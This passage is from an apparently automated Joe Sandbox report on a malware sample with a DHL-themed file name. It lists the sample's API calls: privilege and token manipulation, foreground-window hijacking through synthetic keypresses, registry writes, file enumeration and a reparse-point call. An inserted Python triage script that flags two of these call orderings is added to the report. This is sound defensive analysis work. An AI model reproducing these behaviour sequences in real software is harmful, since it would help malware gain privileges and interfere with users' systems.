                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 3977979337-4164748364
                                                                                    • Opcode ID: ba636faaea24ea0e3029500616bf9a3b7e95bda8962097f827e93cc8e8c387f4
                                                                                    • Instruction ID: 47e9360c235a392135abec53dff978f22d7a6f1b2b3768c5f0fa30cd84d33aad
                                                                                    • Opcode Fuzzy Hash: ba636faaea24ea0e3029500616bf9a3b7e95bda8962097f827e93cc8e8c387f4
                                                                                    • Instruction Fuzzy Hash: 4E42AB74604340AFDB24CF24C849EAABBE5FF88320F140929F699E72B1D771D855DB92
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_memset
                                                                                    • String ID: 3c|$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_|
                                                                                    • API String ID: 1357608183-1990865874
                                                                                    • Opcode ID: 5ad2cc3ed70897c34944df139254283fcd3b3decc5d8753c1505f727034d22fc
                                                                                    • Instruction ID: c9be5829b4f99269cb705fc7fb94938a7def2e10c75eb271c2c279f7db1251d4
                                                                                    • Opcode Fuzzy Hash: 5ad2cc3ed70897c34944df139254283fcd3b3decc5d8753c1505f727034d22fc
                                                                                    • Instruction Fuzzy Hash: 96939D71A00219DBDB68CF98C885BADB7B1FF48314F25816EE945EB2C1E7749E81CB40
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 007B48DF
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007ED665
                                                                                    • IsIconic.USER32(?), ref: 007ED66E
                                                                                    • ShowWindow.USER32(?,00000009), ref: 007ED67B
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED685
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007ED69B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 007ED6A2
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 007ED6AE
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ED6BF
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007ED6C7
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 007ED6CF
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED6D2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED6E7
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED6F2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED6FC
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED701
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED70A
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED70F
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED719
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007ED71E
                                                                                    • SetForegroundWindow.USER32(?), ref: 007ED721
                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 007ED748
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: 005846d0b0f2143b41b52f3300fa5d77d80e1a7f8d4f581406b9bd11ae557005
                                                                                    • Instruction ID: dee0ae06dfb635b48d5e666709639d178cfdbea9290f106d57063962926badb0
                                                                                    • Opcode Fuzzy Hash: 005846d0b0f2143b41b52f3300fa5d77d80e1a7f8d4f581406b9bd11ae557005
                                                                                    • Instruction Fuzzy Hash: 1F317571A41358BBEB305B629C4AF7F7E6CFB88B50F104425FB05EA1D1D6B45D00AAE0
                                                                                    APIs
                                                                                      • Part of subcall function 008087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
                                                                                      • Part of subcall function 008087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
                                                                                      • Part of subcall function 008087E1: GetLastError.KERNEL32 ref: 00808865
                                                                                    • _memset.LIBCMT ref: 00808353
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008083A5
                                                                                    • CloseHandle.KERNEL32(?), ref: 008083B6
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008083CD
                                                                                    • GetProcessWindowStation.USER32 ref: 008083E6
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 008083F0
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0080840A
                                                                                      • Part of subcall function 008081CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808309), ref: 008081E0
                                                                                      • Part of subcall function 008081CB: CloseHandle.KERNEL32(?,?,00808309), ref: 008081F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: 966535d2732d32d1c7b2da3e19e97bfcfc1e86265803b2ad0cb491a27735100d
                                                                                    • Instruction ID: cdbbda6f42068c25dbf95eb7927452e27a9ab78e74ce29d74c65fe20da2e7926
                                                                                    • Opcode Fuzzy Hash: 966535d2732d32d1c7b2da3e19e97bfcfc1e86265803b2ad0cb491a27735100d
                                                                                    • Instruction Fuzzy Hash: 25816AB1900209EFDF519FA4CC45AEE7BB9FF04308F144169FA54E62A1EB318E95DB60
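                                                                                    The two listings above are more useful read as call orderings than as isolated imports: the record at 007ED665 pairs AttachThreadInput with MapVirtualKeyW/keybd_event on key 0x12 and SetForegroundWindow, and the record spanning 00808353 to 0080840A runs LookupPrivilegeValueW and AdjustTokenPrivileges in a callee before DuplicateTokenEx, OpenWindowStationW, SetProcessWindowStation and OpenDesktopW. The Python script below is an added example, not part of this report or of Joe Sandbox: it parses lines in the report's own API-listing format, decodes the virtual-key literals (0x12 is VK_MENU, the Alt key), and flags those two orderings as named patterns. The pattern labels, the function names and the trimmed excerpts are this example's own choices; reading the first ordering as the usual workaround for the foreground-window lock is the standard interpretation of that API triple, not a statement the report makes.

```python
"""Triage helper for the "APIs" listings in Joe Sandbox function records.

Added example, not part of this report or of Joe Sandbox: it parses lines in
the report's own "• Name.MODULE(args), ref: ADDR" format, decodes the
virtual-key constants passed to the keyboard APIs, and flags API orderings
that deserve a second look in a compiled-AutoIt sample.  The pattern labels
and the two excerpts below are this example's own choices.
"""
import re

# One API line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE, an optional "(arg,arg,...)" list, then "ref: ADDR".
API_LINE = re.compile(
    r"•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

# winuser.h virtual-key codes that appear as hex literals in the listings.
VK_NAMES = {0x09: "VK_TAB", 0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU (Alt)"}

# Ordered API subsequences (unrelated calls in between are allowed) and the
# usual reading of each one.  Labels are assumed names chosen for this example.
PATTERNS = {
    "foreground hijack: AttachThreadInput + synthetic Alt press + SetForegroundWindow":
        ["AttachThreadInput", "MapVirtualKeyW", "keybd_event", "SetForegroundWindow"],
    "privilege adjust, token duplication, window-station/desktop switch":
        ["LookupPrivilegeValueW", "AdjustTokenPrivileges", "DuplicateTokenEx",
         "OpenWindowStationW", "SetProcessWindowStation", "OpenDesktopW"],
}


def parse_api_lines(text):
    """Return one dict per recognised API line, in listing order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue  # section headers such as "APIs" or "Strings"
        raw = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub") is not None,  # reached through a callee
        })
    return calls


def is_subsequence(pattern, names):
    """True if every name in pattern occurs in names, in that order."""
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)


def flag_sequences(calls):
    """Labels of every PATTERNS entry that the call order matches."""
    names = [c["name"] for c in calls]
    return [label for label, pat in PATTERNS.items() if is_subsequence(pat, names)]


def decode_keys(calls):
    """(api, VK name) for each keyboard call whose first argument was resolved."""
    out = []
    for c in calls:
        if c["name"] in ("keybd_event", "MapVirtualKeyW", "GetKeyState") and c["args"]:
            try:
                code = int(c["args"][0], 16)
            except ValueError:
                continue  # "?" means the value was not resolved statically
            out.append((c["name"], VK_NAMES.get(code, f"0x{code:02X}")))
    return out


# Excerpts copied from this report's listings, trimmed to the relevant calls.
FOREGROUND_LISTING = """\
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007ED665
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007ED69B
• GetCurrentThreadId.KERNEL32 ref: 007ED6A2
• AttachThreadInput.USER32(?,00000000,00000001), ref: 007ED6BF
• MapVirtualKeyW.USER32(00000012,00000000), ref: 007ED6E7
• keybd_event.USER32(00000012,00000000), ref: 007ED6F2
• SetForegroundWindow.USER32(?), ref: 007ED721
• AttachThreadInput.USER32(?,?,00000000), ref: 007ED748
"""

DESKTOP_LISTING = """\
  • Part of subcall function 008087E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0080882B
  • Part of subcall function 008087E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808858
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008083A5
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 008083CD
• SetProcessWindowStation.USER32(00000000), ref: 008083F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0080840A
"""

if __name__ == "__main__":
    for func, listing in (("007ED665", FOREGROUND_LISTING), ("00808353", DESKTOP_LISTING)):
        calls = parse_api_lines(listing)
        print(func, flag_sequences(calls), decode_keys(calls))
```

                                                                                    Subsequence matching is deliberate: the report interleaves unrelated calls (window lookups, thread-id queries, a trailing AttachThreadInput detach) between the calls that matter, so an exact-adjacency match would miss the ordering. Arguments shown as "?" were not resolved statically by the plugin and are skipped rather than guessed.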
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0081C78D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081C7E1
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081C806
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081C81D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0081C844
                                                                                    • __swprintf.LIBCMT ref: 0081C890
                                                                                    • __swprintf.LIBCMT ref: 0081C8D3
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • __swprintf.LIBCMT ref: 0081C927
                                                                                      • Part of subcall function 007D3698: __woutput_l.LIBCMT ref: 007D36F1
                                                                                    • __swprintf.LIBCMT ref: 0081C975
                                                                                      • Part of subcall function 007D3698: __flsbuf.LIBCMT ref: 007D3713
                                                                                      • Part of subcall function 007D3698: __flsbuf.LIBCMT ref: 007D372B
                                                                                    • __swprintf.LIBCMT ref: 0081C9C4
                                                                                    • __swprintf.LIBCMT ref: 0081CA13
                                                                                    • __swprintf.LIBCMT ref: 0081CA62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 3953360268-2428617273
                                                                                    • Opcode ID: f880bb49c7efea769eef958861bd4781c0515af3d75c81bd1ab92bf6bdf0935a
                                                                                    • Instruction ID: 7b6915c6a55323ec136145757827af5677ebaa7845a85ecac03f3dbd07c2235d
                                                                                    • Opcode Fuzzy Hash: f880bb49c7efea769eef958861bd4781c0515af3d75c81bd1ab92bf6bdf0935a
                                                                                    • Instruction Fuzzy Hash: 60A10DB1508304EBD754EB94C889EEFB7ECFF95704F400929F695C6191EA34EA48CB62
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0081EFB6
                                                                                    • _wcscmp.LIBCMT ref: 0081EFCB
                                                                                    • _wcscmp.LIBCMT ref: 0081EFE2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0081EFF4
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0081F00E
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0081F026
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F031
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F04D
                                                                                    • _wcscmp.LIBCMT ref: 0081F074
                                                                                    • _wcscmp.LIBCMT ref: 0081F08B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F09D
                                                                                    • SetCurrentDirectoryW.KERNEL32(00868920), ref: 0081F0BB
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F0C5
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F0D2
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F0E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: 640d79eb393f8b876c10935f84b95b6e39c787b842228780cc72c2e4f1b07a0a
                                                                                    • Instruction ID: 31c0fd0a1fd63248db6d64b08c245cb5069d76f4b38f0fd48237360803169b9a
                                                                                    • Opcode Fuzzy Hash: 640d79eb393f8b876c10935f84b95b6e39c787b842228780cc72c2e4f1b07a0a
                                                                                    • Instruction Fuzzy Hash: F631C432900609AADB149BB4EC59AEE77ACFF48360F100576FA14D21A2DB74DA80CE91
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00830953
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0083F910,00000000,?,00000000,?,?), ref: 008309C1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00830A09
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00830A92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00830DB2
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00830DBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: 4ccd266bd330cf843de91c7044dc8eae4b9a819b7c78a50df641581f43d29e14
                                                                                    • Instruction ID: 03911400d61299ec1867987e96e2c44d4707ba577ffa0867f37da2c4a08b1fb0
                                                                                    • Opcode Fuzzy Hash: 4ccd266bd330cf843de91c7044dc8eae4b9a819b7c78a50df641581f43d29e14
                                                                                    • Instruction Fuzzy Hash: AE022475604601DFCB14EF28C859E6AB7E5FF89314F048959F99A9B3A2DB34EC01CB81
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0081F113
                                                                                    • _wcscmp.LIBCMT ref: 0081F128
                                                                                    • _wcscmp.LIBCMT ref: 0081F13F
                                                                                      • Part of subcall function 00814385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 008143A0
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0081F16E
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F179
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0081F195
                                                                                    • _wcscmp.LIBCMT ref: 0081F1BC
                                                                                    • _wcscmp.LIBCMT ref: 0081F1D3
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081F1E5
                                                                                    • SetCurrentDirectoryW.KERNEL32(00868920), ref: 0081F203
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0081F20D
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F21A
                                                                                    • FindClose.KERNEL32(00000000), ref: 0081F22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: 9c4a0d282b468de80c4bb96c78afe02cfdf3a8c624308e792baae949f672a5f4
                                                                                    • Instruction ID: 25f17b09f751f506e336f4f644340b5bfcbacb591188b30e79c0f641e783d865
                                                                                    • Opcode Fuzzy Hash: 9c4a0d282b468de80c4bb96c78afe02cfdf3a8c624308e792baae949f672a5f4
                                                                                    • Instruction Fuzzy Hash: 8B31C736900219BADB109B74EC59EEE77ACFF85360F100575FA14E31A2DB34DE85CA94
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0081A20F
                                                                                    • __swprintf.LIBCMT ref: 0081A231
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0081A26E
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0081A293
                                                                                    • _memset.LIBCMT ref: 0081A2B2
                                                                                    • _wcsncpy.LIBCMT ref: 0081A2EE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0081A323
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0081A32E
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0081A337
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0081A341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: f80b16e40dec9c2407cb35a440f75273bf5c91355384c2e3291df336dc4c9ec8
                                                                                    • Instruction ID: 2a6e022082a1d07941f790df68e077179299781967e07bcc095553c8c03d1985
                                                                                    • Opcode Fuzzy Hash: f80b16e40dec9c2407cb35a440f75273bf5c91355384c2e3291df336dc4c9ec8
                                                                                    • Instruction Fuzzy Hash: E331B4B5900109ABDB21DFA0DC49FEB77BCFF88740F1041B6FA18D2261EB7496858B65
                                                                                    APIs
                                                                                      • Part of subcall function 00808202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0080821E
                                                                                      • Part of subcall function 00808202: GetLastError.KERNEL32(?,00807CE2,?,?,?), ref: 00808228
                                                                                      • Part of subcall function 00808202: GetProcessHeap.KERNEL32(00000008,?,?,00807CE2,?,?,?), ref: 00808237
                                                                                      • Part of subcall function 00808202: HeapAlloc.KERNEL32(00000000,?,00807CE2,?,?,?), ref: 0080823E
                                                                                      • Part of subcall function 00808202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00808255
                                                                                      • Part of subcall function 0080829F: GetProcessHeap.KERNEL32(00000008,00807CF8,00000000,00000000,?,00807CF8,?), ref: 008082AB
                                                                                      • Part of subcall function 0080829F: HeapAlloc.KERNEL32(00000000,?,00807CF8,?), ref: 008082B2
                                                                                      • Part of subcall function 0080829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00807CF8,?), ref: 008082C3
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00807D13
                                                                                    • _memset.LIBCMT ref: 00807D28
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00807D47
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00807D58
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00807D95
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00807DB1
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00807DCE
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00807DDD
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00807DE4
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00807E05
                                                                                    • CopySid.ADVAPI32(00000000), ref: 00807E0C
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00807E3D
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00807E63
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00807E77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                                                                                    • Instruction ID: 181221c39bd7d170321154ac9ec53c5ddf82aeb3abacb961bedc2ff44a7c1e46
                                                                                    • Opcode Fuzzy Hash: 28c071b7baacfa6a124e97e925a49a9866fbd45c98f08ff50bc7dc45734029fa
                                                                                    • Instruction Fuzzy Hash: F3617970D04209EFDF44DFA4DC84AAEBB79FF44B00F008569E915E6292DB30AA05CBA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
